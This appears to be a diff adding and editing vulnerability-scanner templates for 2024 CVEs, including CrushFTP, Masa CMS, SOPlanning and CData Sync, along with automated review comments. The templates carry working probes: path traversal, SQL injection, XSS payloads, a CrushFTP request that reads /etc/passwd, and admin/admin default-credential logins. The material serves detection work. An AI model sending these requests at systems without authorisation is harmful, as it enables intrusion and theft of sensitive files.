||||
severity: high
|
||||
description: |
|
||||
A path traversal vulnerability exists in the Java version of CData Sync < 23.4.8843 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.
|
||||
reference:
|
||||
- https://www.tenable.com/security/research/tra-2024-09
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-31851
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2024-31851
|
||||
cwe-id: CWE-22
|
||||
epss-score: 0.00044
|
||||
epss-percentile: 0.09773
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: title:"CData Sync"
|
||||
tags: cve,cve2024,cdata,lfi
|
||||
|
||||
flow: http(1) && http(2)
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/login.rst'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
internal: true
|
||||
words:
|
||||
- '<title>CData - Sync'
|
||||
|
||||
- raw:
|
||||
- |
|
||||
GET /ui/..\src\getSettings.rsb?@json HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Referer: {{RootURL}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"items":[{'
|
||||
- ':"true"'
|
||||
- 'notifyemail'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'application/json'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100842e24cc880d77226e1303cecc992eba04ec11f26e0a04b9dda1a8e79668d748022100bf52bffb2d81f6061330180b33406e553b52f778bc07ebb4365d98c249849ae6:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,41 @@
|
|||
id: CVE-2024-32640
|
||||
|
||||
info:
|
||||
name: Mura/Masa CMS - SQL Injection
|
||||
author: iamnoooob,rootxharsh,pdresearch
|
||||
severity: critical
|
||||
description: |
|
||||
The Mura/Masa CMS is vulnerable to SQL Injection.
|
||||
impact: |
|
||||
Successful exploitation could lead to unauthorized access to sensitive data.
|
||||
remediation: |
|
||||
Apply the vendor-supplied patch or update to a secure version.
|
||||
reference:
|
||||
- https://blog.projectdiscovery.io/hacking-apple-with-sql-injection/
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32640
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: masacms
|
||||
product: masacms
|
||||
shodan-query: 'Generator: Masa CMS'
|
||||
tags: cve,cve2024,sqli,cms,masa,masacms
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
object=displayregion&contenthistid=x\'&previewid=1
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code == 500'
|
||||
- 'contains(header, "application/json")'
|
||||
- 'contains_all(body, "Unhandled Exception")'
|
||||
- 'contains_all(header,"cfid","cftoken")'
|
||||
condition: and
|
||||
# digest: 490a0046304402205137d62a1a156eb05abb3b8cf2e25cf11515c4d7e2f7e0180a2178ad123af0d1022076a749c27251a5412b13e303a6a6724eb2c1d40dbfe236975cd2f0f1050201dd:922c64590222798bb761d5b6d8e72950
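Review bot: The matcher treats any HTTP 500 JSON response containing `Unhandled Exception` plus `cfid`/`cftoken` as proof of injection, which an unrelated server error on this endpoint would also satisfy. Nothing in the DSL ties the error to the database layer or to the quoted `contenthistid` value. Consider sending the same request with a benign `contenthistid` first and requiring that it does not return the 500, so the finding reflects a difference caused by the quote. `contains_all(body, "Unhandled Exception")` takes a single argument and can be written `contains(body, "Unhandled Exception")`. The `info` block also lacks the `classification` section that the sibling CVE templates carry.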
|
|
@ -0,0 +1,57 @@
|
|||
id: CVE-2024-32651
|
||||
|
||||
info:
|
||||
name: Change Detection - Server Side Template Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-32651
|
||||
- https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-4r7v-whpg-8rx3
|
||||
- https://github.com/dgtlmoon/changedetection.io/releases/tag/0.45.21
|
||||
- https://www.onsecurity.io/blog/server-side-template-injection-with-jinja2
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10
|
||||
cve-id: CVE-2024-32651
|
||||
cwe-id: CWE-1336
|
||||
epss-score: 0.00045
|
||||
epss-percentile: 0.14322
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: html:"Change Detection"
|
||||
tags: cve,cve2024,changedetection,ssti,rce,passive
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{RootURL}}/"
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
extractors:
|
||||
- type: xpath
|
||||
name: version
|
||||
internal: true
|
||||
xpath:
|
||||
- "//*[@id=\"right-sticky\"]"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Change Detection"
|
||||
condition: and
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- compare_versions(version, '<= 0.45.20')
|
||||
# digest: 490a004630440220166f3ac3c6c4657641c4499aa0d8cd1096190ee1a19bb4497770c30fac5558da0220174976fb80906ac6496cdb1e657106b3c93cdde5f8980ed3ab7c0bcf2de63113:922c64590222798bb761d5b6d8e72950
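Review bot: `redirects: true` lets the request follow a redirect to a different host, so the version banner that is matched may belong to a site other than the one being scanned; `host-redirects: true`, used by other templates in this commit, keeps the check on the target. The same setting appears in the new teamforge-panel and squadcast-takeover templates. Detection here rests only on the extracted version string, so an instance carrying a backported fix would still be flagged; the description should say the result is version-based. The word matcher's `condition: and` has no effect with a single word.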
|
|
@ -21,7 +21,7 @@ info:
|
|||
metadata:
|
||||
verified: true
|
||||
fofa-query: app="D_Link-DNS-ShareCenter"
|
||||
tags: cve,cve2024,dlink,nas
|
||||
tags: cve,cve2024,dlink,nas,kev
|
||||
|
||||
variables:
|
||||
cmd: "id"
|
||||
|
@ -45,4 +45,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 480a00453043022055f08688d87627d1f6d57c487916c9884884e1032ac46525aab49882310ceb3e021f4ea7ae65ecc64abd81d4c033cab522110e08a8c7f4dc1395b60f90d99b9014:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100f7987354e025dbc03f2e1afa23c2973af3ef684babd4e5fd110f4a90f06083ab022100fb410f784e3b4a10502077ab8b122e04039b29dea9df90707725691983bfe80d:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2024-33575
|
||||
|
||||
info:
|
||||
name: User Meta WP Plugin < 3.1 - Sensitive Information Exposure
|
||||
author: Kazgangap
|
||||
severity: medium
|
||||
description: |
|
||||
The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.
|
||||
remediation: Fixed in 3.1
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-33575
|
||||
- https://wpscan.com/vulnerability/3b75549c-3fc5-4e6f-84ae-264d8276bfb3/
|
||||
- https://patchstack.com/database/vulnerability/user-meta/wordpress-user-meta-plugin-3-0-sensitive-data-exposure-vulnerability?_s_id=cve
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cve-id: CVE-2024-33575
|
||||
cwe-id: CWE-200
|
||||
epss-score: 0.00043
|
||||
epss-percentile: 0.08268
|
||||
metadata:
|
||||
vendor: User Meta
|
||||
product: User Meta
|
||||
framework: wordpress
|
||||
publicwww-query: "/wp-content/plugins/user-meta/"
|
||||
tags: wpscan,cve,cve2024,user-meta,wordpress,wp-plugin,info-leak
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-content/plugins/user-meta/views/debug.php"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code == 200'
|
||||
- 'contains(body, "um-debug<br/>")'
|
||||
condition: and
|
||||
# digest: 4a0a0047304502200273cf6345bda7ae0f53bba3ecd04ff070ee62c82b146898fc2a612f9363f6d602210087a74005c7a282fc34b4d12bdbe7fe68c141019e1ab85581d000d319aeff2fd5:922c64590222798bb761d5b6d8e72950
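Review bot: The last sentence of the description is garbled (`unauthenticated attackers, with to extract`); it should read `This makes it possible for unauthenticated attackers to extract sensitive configuration data.` The first sentence also drops the word "plugin" (`The User Meta is vulnerable`). `metadata` has no `verified` or `max-request` entry, unlike the other templates added in this commit; `max-request: 1` matches the single GET.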
|
|
@ -0,0 +1,49 @@
|
|||
id: CVE-2024-33724
|
||||
|
||||
info:
|
||||
name: SOPlanning 1.52.00 Cross Site Scripting
|
||||
author: Kazgangap
|
||||
severity: medium
|
||||
description: |
|
||||
SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/178434/SOPlanning-1.52.00-Cross-Site-Scripting.html
|
||||
- https://github.com/fuzzlove/soplanning-1.52-exploits
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 2
|
||||
vendor: soplanning
|
||||
product: soplanning
|
||||
shodan-query: html:"soplanning"
|
||||
tags: packetstorm,cve,cve2024,authenticated,soplanning,xss
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /process/login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
login={{username}}&password={{password}}
|
||||
|
||||
- |
|
||||
GET /process/groupe_save.php?saved=1&groupe_id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C!--&nom=Project+New HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
attack: pitchfork
|
||||
|
||||
payloads:
|
||||
username:
|
||||
- admin
|
||||
password:
|
||||
- admin
|
||||
|
||||
host-redirects: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains_all(body_2, "<script>alert(document.domain)</script>", "SOPlanning")'
|
||||
condition: and
|
||||
# digest: 4a0a00473045022100b2ba794854d39f477eba7ecc4a2ef4a49c3994da43c6768fa8b7833d9ff576a8022036b5166302b1717b96a5fbae6062df8b924ee738794571eae1eb2fe2aa69dc55:922c64590222798bb761d5b6d8e72950
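Review bot: The matcher accepts the reflected `<script>` string in any 200 response without checking that the response is HTML, so a JSON or plain-text echo of `groupe_id` would be reported as XSS; adding `- 'contains(header_2, "text/html")'` to the `dsl` list closes that gap. Nothing asserts that the login request succeeded, so when `admin`/`admin` is rejected the second request runs unauthenticated and the result is hard to interpret. The description also misspells "unauthenticated" and runs two sentences together after `parameters`.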
|
|
@ -0,0 +1,125 @@
|
|||
id: CVE-2024-4040
|
||||
|
||||
info:
|
||||
name: CrushFTP VFS - Sandbox Escape LFR
|
||||
author: DhiyaneshDK,pussycat0x
|
||||
severity: critical
|
||||
description: |
|
||||
VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
|
||||
impact: |
|
||||
Successful exploitation could lead to unauthorized access to sensitive data.
|
||||
remediation: |
|
||||
Apply the vendor-supplied patch or upgrade to the latest version to mitigate CVE-2024-4040.
|
||||
reference:
|
||||
- https://www.bleepingcomputer.com/news/security/crushftp-warns-users-to-patch-exploited-zero-day-immediately/
|
||||
- https://www.crushftp.com/crush10wiki/Wiki.jsp?page=Update
|
||||
- https://www.reddit.com/r/crowdstrike/comments/1c88788/situational_awareness_20240419_crushftp_virtual/
|
||||
- https://www.reddit.com/r/cybersecurity/comments/1c850i2/all_versions_of_crush_ftp_are_vulnerable/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10
|
||||
cve-id: CVE-2024-4040
|
||||
cwe-id: CWE-94,CWE-1336
|
||||
epss-score: 0.016
|
||||
epss-percentile: 0.87316
|
||||
cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 2
|
||||
vendor: crushftp
|
||||
product: crushftp
|
||||
shodan-query: html:"CrushFTP"
|
||||
tags: cve,cve2024,lfr,crushftp,vfs,kev
|
||||
|
||||
flow: |
|
||||
if ( !template.hasOwnProperty('username') || !template.hasOwnProperty('password') ) {
|
||||
// if username or password is not provided, run unauthenticated exploit
|
||||
http("unauth-exploit")
|
||||
} else {
|
||||
// if username and password is provided, run login script and authenticated exploit
|
||||
http("login") && http("auth-exploit")
|
||||
}
|
||||
|
||||
http:
|
||||
# unauthenticated exploit
|
||||
- id: unauth-exploit
|
||||
raw:
|
||||
- |
|
||||
GET /WebInterface/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
- |
|
||||
POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- "root:x:"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/xml"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: auth
|
||||
internal: true
|
||||
part: header_1
|
||||
group: 1
|
||||
regex:
|
||||
- 'currentAuth=([0-9a-zA-Z]+)'
|
||||
# login script
|
||||
- id: login
|
||||
raw:
|
||||
- |
|
||||
GET /WebInterface/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
- |
|
||||
POST /WebInterface/function/ HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Length: 111
|
||||
Origin: {{RootURL}}
|
||||
Referer: http://{{RootURL}}/WebInterface/login.html
|
||||
|
||||
command=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926
|
||||
|
||||
stop-at-first-match: true
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body_2
|
||||
internal: true
|
||||
words:
|
||||
- "<response>success</response>"
|
||||
|
||||
- type: word
|
||||
part: header_2
|
||||
internal: true
|
||||
words:
|
||||
- "text/xml"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: auth
|
||||
internal: true
|
||||
part: header_2
|
||||
group: 1
|
||||
regex:
|
||||
- 'currentAuth=([0-9a-zA-Z]+)'
|
||||
# authenticated exploit
|
||||
- id: auth-exploit
|
||||
raw:
|
||||
- |
|
||||
POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "root:x:"
|
||||
# digest: 490a00463044022034365345ca960cac174d54cf353f25ea720b065bf9bd3d8e354696368908c0b702203f998746363311340e85f3d692227a4c849f84ebe03837ea3004486821b6e19c:922c64590222798bb761d5b6d8e72950
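Review bot: The `login` request hard-codes `Content-Length: 111` although the body length changes with `{{username}}` and `{{password}}`; if the header is sent as written, the server reads a truncated or short body and the login step fails for most credentials. Drop the line and let the client compute the length. `Referer: http://{{RootURL}}/WebInterface/login.html` prefixes a scheme to a variable that already carries one; `Referer: {{RootURL}}/WebInterface/login.html` is the intended value. The POST also sends a form body without `Content-Type: application/x-www-form-urlencoded`, which the other form posts in this commit include.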
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2024-4348
|
||||
|
||||
info:
|
||||
name: osCommerce v4.0 - Cross-site Scripting
|
||||
author: Kazgangap
|
||||
severity: medium
|
||||
description: |
|
||||
A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/178375/osCommerce-4-Cross-Site-Scripting.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2024-4348
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
|
||||
cvss-score: 4.3
|
||||
cve-id: CVE-2024-4348
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 2
|
||||
shodan-query: html:"osCommerce"
|
||||
tags: packetstorm,xss,rxss,oscommerce
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/furniture/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%2528'document_domain'%2529%253c%252fScRiPt%253eiyehb=1"
|
||||
- "{{BaseURL}}/watch/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%2528'document_domain'%2529%253c%252fScRiPt%253eiyehb=1"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<ScRiPt>alert('document_domain')</ScRiPt>"
|
||||
- "Listing of all products on the site"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/html'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 490a0046304402204d3f2a0f97eb7ea7fe180e934519026ed231f12223669f51926597f7209ee4a402201edf5e99628b2435af3325bf2f7cac5db876ef8960118f25a1b0cbe87998d6dd:922c64590222798bb761d5b6d8e72950
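Review bot: `tags` omits `cve` and `cve2024` even though the template id is CVE-2024-4348, so scans and reports filtered on those tags will miss it; `tags: cve,cve2024,packetstorm,xss,rxss,oscommerce` matches the other CVE templates in this commit. Both paths assume the `/furniture/` and `/watch/` storefront prefixes, so an installation without them yields no result. A comment above `path:` noting that limitation would help triage.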
|
|
@ -0,0 +1,49 @@
|
|||
id: soplanning-default-login
|
||||
|
||||
info:
|
||||
name: SOPlanning - Default Login
|
||||
author: Kazgangap
|
||||
severity: high
|
||||
description: |
|
||||
SOPlanning contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
|
||||
reference:
|
||||
- https://www.soplanning.org/en/
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
vendor: soplanning
|
||||
product: soplanning
|
||||
shodan-query: html:"soplanning"
|
||||
tags: soplanning,default-login
|
||||
|
||||
http:
|
||||
- raw:
|
||||
- |
|
||||
POST /process/login.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
login={{username}}&password={{password}}
|
||||
|
||||
attack: pitchfork
|
||||
payloads:
|
||||
username:
|
||||
- admin
|
||||
password:
|
||||
- admin
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'title="Logout"'
|
||||
- 'title="Modify my profile"'
|
||||
- 'Settings'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100b3d86e9e10bde636e6ff84016fd5241457bcac181d4c2b3192a646880f744dc902205cb3645bb990dc1492bf69406d5d8bdf9cfb6c1f2673f843d980c65713f09a92:922c64590222798bb761d5b6d8e72950
|
|
@ -0,0 +1,37 @@
|
|||
id: cyberchef-panel
|
||||
|
||||
info:
|
||||
name: Cyber Chef Panel - Detect
|
||||
author: rxerium
|
||||
severity: info
|
||||
description: |
|
||||
A Cyber Chef Panel was detected
|
||||
reference:
|
||||
- https://cyberchef.org
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
shodan-query: title:"CyberChef"
|
||||
tags: panel,cyberchef,login,detect
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '<title>CyberChef</title>'
|
||||
- 'The Cyber Swiss Army Knife'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4a0a00473045022100eeeab550b83b31bc31e069dbc7d7cce471d8989ea66e1b428296670776bee510022063c48214d5a3acd4d45dc0a9a6332f1d1d6af2a34518b2388a9183e83622e986:922c64590222798bb761d5b6d8e72950
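Review bot: The `login` tag does not fit this template: the matcher fingerprints the page by its title and tagline, and nothing in it relates to an authentication form. As far as I know CyberChef is a client-side tool with no login, so the tag would pull it into login-panel inventories by mistake; `tags: panel,cyberchef,detect` is closer. The name `Cyber Chef Panel - Detect` also splits the product name that the matcher and `shodan-query` spell `CyberChef`.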
|
|
@ -2,7 +2,7 @@ id: ms-exchange-web-service
|
|||
|
||||
info:
|
||||
name: Microsoft Exchange Web Service - Detect
|
||||
author: bhutch
|
||||
author: bhutch,userdehghani
|
||||
severity: info
|
||||
description: |
|
||||
Microsoft Exchange Web Services was detected.
|
||||
|
@ -23,7 +23,9 @@ http:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/EWS/Exchange.asmx"
|
||||
- "{{BaseURL}}/owa/service.svc"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
|
@ -34,9 +36,10 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 401
|
||||
- 302
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
kval:
|
||||
- x_owa_version
|
||||
# digest: 490a0046304402206f5d9c0e0b23e4a8ae9d2f4b99f3688c2daef6cb59037899bfea6455bbcf654f0220058960e38002865396412449c4bd3a73c107d3ffbb32c56088b70801e6cbef79:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100fb3512635763556b898da7ebbc54996873117953a7ba2fbc3b876c9a8a133c94022100e38b042a828cb26dcee5a24ebc661d61e01dba07dc2265fe1e5315b99ef39ecb:922c64590222798bb761d5b6d8e72950
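Review bot: The status matcher now lists `302` next to `401`, but the regex matcher it is combined with under `matchers-condition: and` lies outside the hunks, so it cannot be confirmed here that a redirect response from `/owa/service.svc` still carries what the regex keys on. If it does not, the new path never matches and only adds a request; if it does, a comment on the `302` line saying which endpoint produces it would help. With a second path added, `max-request` in `metadata` (also outside the hunks) presumably needs to become 2.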
|
|
@ -0,0 +1,34 @@
|
|||
id: openwebui-panel
|
||||
|
||||
info:
|
||||
name: Openweb UI Panel - Detect
|
||||
author: rxerium
|
||||
severity: info
|
||||
description: |
|
||||
An OpenWebUI panel was detected
|
||||
reference:
|
||||
- https://openwebui.com/
|
||||
metadata:
|
||||
shodan-query: http.favicon.hash:-286484075
|
||||
verified: true
|
||||
max-request: 1
|
||||
tags: panel,openwebui,login
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Open WebUI</title>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 490a00463044022048aa2d97cb641c772a571a2a22c80a72ab6ecde248ac954dd98c6f0c6d5c132a022028396fa47061b9bf3c01e83d1c68f4ecfe3b48e213c90ef7fd1d60e78dfd3106:922c64590222798bb761d5b6d8e72950
|
|
@ -1,7 +1,7 @@
|
|||
id: rdweb-panel
|
||||
|
||||
info:
|
||||
name: RD Web Access - Panel Detect
|
||||
name: RD Web Access Panel - Detect
|
||||
author: rxerium,sorrowx3
|
||||
severity: info
|
||||
description: |
|
||||
|
@ -11,12 +11,12 @@ info:
|
|||
classification:
|
||||
cpe: cpe:2.3:a:microsoft:remote_desktop:*:*:*:*:android:*:*:*
|
||||
metadata:
|
||||
verified: true
|
||||
max-request: 1
|
||||
product: remote_desktop
|
||||
shodan-query: html:"RD Web Access"
|
||||
vendor: microsoft
|
||||
verified: true
|
||||
tags: panel,login,rdp,web-access,microsoft
|
||||
shodan-query: html:"RD Web Access"
|
||||
tags: panel,login,rdp,web-access,Microsoft,detect
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
|
@ -24,16 +24,19 @@ http:
|
|||
- '{{BaseURL}}/RDWeb/'
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 1
|
||||
max-redirects: 2
|
||||
|
||||
matchers-condition: and
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "TSWAFeatureCheckCookie=true; path=/RDWeb/"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 302
|
||||
# digest: 4b0a00483046022100b7bd22946afb7a0c73f3415567391e04361324b834a9c1f09a9c667ff9037b9d022100f0f3c01f592d151a12b1646bc53cc6476f189947426cadaeecc52cc2e1d37cd2:922c64590222798bb761d5b6d8e72950
|
||||
- type: word
|
||||
part: response
|
||||
words:
|
||||
- "<rdp-client-top-view>"
|
||||
- "Microsoft Remote Desktop"
|
||||
condition: and
|
||||
# digest: 4b0a00483046022100d8d5f14d81fae08877f82099f30744869551a6a2f479d508120a516ab6fb8335022100ff88220b9a98dfb6d2d2a80179efe81c1900430b2e67740c681830d8e98843bc:922c64590222798bb761d5b6d8e72950
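Review bot: The new tag list capitalises `Microsoft` (`panel,login,rdp,web-access,Microsoft,detect`) where the previous line and `vendor: microsoft` use lower case; this looks accidental and should be `tags: panel,login,rdp,web-access,microsoft,detect` so tag filters keep working. Going by the hunk's line counts, the status matcher is removed and `matchers-condition` becomes `or`, so the `TSWAFeatureCheckCookie` header alone now produces a finding. That may be intended, but a comment above `matchers-condition: or` explaining why either signal is sufficient would save the next reviewer the question.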
|
|
@ -0,0 +1,43 @@
|
|||
id: teamforge-panel
|
||||
|
||||
info:
|
||||
name: TeamForge Panel - Detection
|
||||
author: lstatro
|
||||
severity: info
|
||||
description: |
|
||||
TeamForge Login Panel was discovered.
|
||||
reference:
|
||||
- https://digital.ai/products/teamforge/
|
||||
metadata:
|
||||
shodan-query: title:"TeamForge :"
|
||||
fofa-query: title="TeamForge :"
|
||||
verified: true
|
||||
max-request: 1
|
||||
tags: panel,teamforge,login
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
redirects: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<title>TeamForge :"
|
||||
- "Log In to TeamForge"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: version
|
||||
part: body
|
||||
regex:
|
||||
- "teamforge(\\d+)"
|
||||
# digest: 4b0a00483046022100eafaf68f542e3da6a5f1b773c1feeef158b2441185e3be71c6fcb57e60093517022100ab0a381b8d93304d88deb969b7e289ce04ff71bc91173661685955160fd4dcb4:922c64590222798bb761d5b6d8e72950
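Review bot: The `version` extractor's regex `teamforge(\\d+)` has a capture group but no `group: 1`, so the extracted value is the whole match, literal prefix included, rather than the number; add `group: 1` under the extractor. `redirects: true` is also set without `max-redirects`, whereas the other panel templates in this commit pair `host-redirects: true` with `max-redirects: 2`.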
|
|
@ -22,7 +22,7 @@ http:
|
|||
- "{{BaseURL}}/settings.php.save"
|
||||
- "{{BaseURL}}/settings.php.swp"
|
||||
- "{{BaseURL}}/settings.php.txt"
|
||||
- "{{BaseURL}}config/settings.old.php"
|
||||
- "{{BaseURL}}/config/settings.old.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
@ -35,4 +35,4 @@ http:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
# digest: 4b0a00483046022100eba9de4436d8e08669f91da6cbd54d44279778bcf9fec5b5e930a1d6b5f8e56e022100a11699b4af7715f48e25cc159b1709c6396bf4ae8be69c37d82a477bc75689f5:922c64590222798bb761d5b6d8e72950
|
||||
# digest: 4b0a00483046022100bfdece869f625f103aa1abf3d734cc9c383709e5ee0cceaf35396893fbf45db8022100f0cd8e024f5a399219c954b811b55195a197848196c3b7c610d984e30f03cfda:922c64590222798bb761d5b6d8e72950
|
|
@ -3,7 +3,7 @@ id: cloudflare-rocketloader-htmli
|
|||
info:
|
||||
name: Cloudflare Rocket Loader - HTML Injection
|
||||
author: j3ssie
|
||||
severity: low
|
||||
severity: unknown
|
||||
description: |
|
||||
The Rocket Loader feature in Cloudflare allow attackers to inject arbitrary HTML into the website. This can be used to perform various attacks such as phishing, defacement, etc.
|
||||
